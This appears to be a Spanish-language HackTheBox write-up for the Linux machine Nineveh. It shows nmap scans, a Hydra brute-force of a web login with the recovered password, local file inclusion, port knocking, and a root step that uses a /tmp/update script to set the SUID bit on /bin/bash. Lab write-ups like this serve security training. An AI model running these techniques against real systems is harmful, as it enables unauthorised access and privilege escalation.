$

Nineveh

2024-04-27 · #ctf#hackthebox#linux#web

Nineveh
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Linux Medium 04 Aug 2017 Yas3r

Escaneo de puertos

nmap_ports 10.10.10.43                                                                                                                     
[+] Running: nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 21:14 -03
Initiating SYN Stealth Scan at 21:14
Scanning 10.10.10.43 [65535 ports]
Discovered open port 80/tcp on 10.10.10.43
Discovered open port 443/tcp on 10.10.10.43
Completed SYN Stealth Scan at 21:15, 27.01s elapsed (65535 total ports)
Nmap scan report for 10.10.10.43
Host is up, received user-set (0.29s latency).
Scanned at 2025-04-27 21:14:42 -03 for 27s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds
           Raw packets sent: 131085 (5.768MB) | Rcvd: 23 (1.012KB)

Enumeración de versión y servicio

nmap -sCV -p80,443 -oN servicesScan 10.10.10.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 21:15 -03
Nmap scan report for 10.10.10.43 (10.10.10.43)
Host is up (0.25s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.76 seconds

Explotación inicial

HTTP (80)

Nineveh

Nineveh

Nineveh

Nineveh

Sabemos que el usuario admin existe por el mensaje de error que presenta la web.

Nineveh

Realizamos fuerza bruta con Hydra

Nineveh

admin:1q2w3e4r5t

Nineveh

Nineveh

HTTPS (443)

Nineveh

Si realizamos web fuzzing, encontramos el directorio db.

Nineveh

Nineveh

Local File Inclusion

Nineveh

Nineveh

Port Knocking

Nineveh

Nineveh

Nineveh

Nineveh

Nineveh

strings nineveh.png

Nineveh

Nineveh

Nineveh

Escalación de privilegios (root)

Nineveh

  • https://www.exploit-db.com/exploits/33899

Creamos un binario /tmp/update el cual le asigne permisos SUID a la bash.

#!/bin/bash

chmod u+s /bin/bash

Nineveh

Nineveh